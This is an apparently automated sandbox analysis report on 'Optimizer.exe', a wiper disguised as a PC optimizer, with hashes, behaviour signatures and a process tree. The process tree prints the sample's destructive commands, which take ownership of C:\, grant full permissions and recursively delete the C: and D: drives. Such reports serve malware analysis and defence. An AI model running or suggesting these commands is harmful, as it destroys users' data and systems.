Analysis

  • max time kernel
    84s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    26-11-2024 15:52

General

  • Target

    Optimizer.exe

  • Size

    159KB

  • MD5

    59c1d1b1d0e5447efc7dea6087ecee39

  • SHA1

    b824b16e781a3238dfe9bbe3b34990a1054c48d5

  • SHA256

    c1d0c89274c04a62eed5c41f5fe592e95dbd4e4e2e25b6000ebb5ddefd2124cb

  • SHA512

    cba7c13bb2e9267d2c78bb9f98fcca1a8b2c84ad6cd27cae9e0b701107c944d292dfdc032bd8a90c4877c04b173703ff8a66246002ab9bdb85e3604a843a5ddc

  • SSDEEP

    3072:+vjciRUMVLEK/NwhxaE0UojUPeKW74MELtomx9avYFZloH8:UjeJcQ900eWZxWvYFZloH8

Malware Config

Signatures

  • Drops file in Drivers directory 64 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 2 IoCs
  • Drops autorun.inf file 1 TTPs 1 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Optimizer.exe
    "C:\Users\Admin\AppData\Local\Temp\Optimizer.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4400
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c chcp 65001 && cls && title PC FUCKER OPTIMIZER && color 0B && mode 145,30
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1056
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:4920
        • C:\Windows\system32\mode.com
          mode 145,30
          3⤵
            PID:1036
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c takeown /f C:\ /r /d y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4816
          • C:\Windows\system32\takeown.exe
            takeown /f C:\ /r /d y
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:1696
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\ /grant administrators:F /t
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4212
          • C:\Windows\system32\icacls.exe
            icacls C:\ /grant administrators:F /t
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:4584
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c rd /s /q D:\
          2⤵
            PID:2552
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c rd /s /q C:\
            2⤵
            • Drops file in Drivers directory
            • Drops desktop.ini file(s)
            • Drops autorun.inf file
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • Drops file in Windows directory
            PID:3532

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/4400-0-0x00007FF61F8E0000-0x00007FF61F93A000-memory.dmp

          Filesize

          360KB

        • memory/4400-2-0x00007FF61F8E0000-0x00007FF61F93A000-memory.dmp

          Filesize

          360KB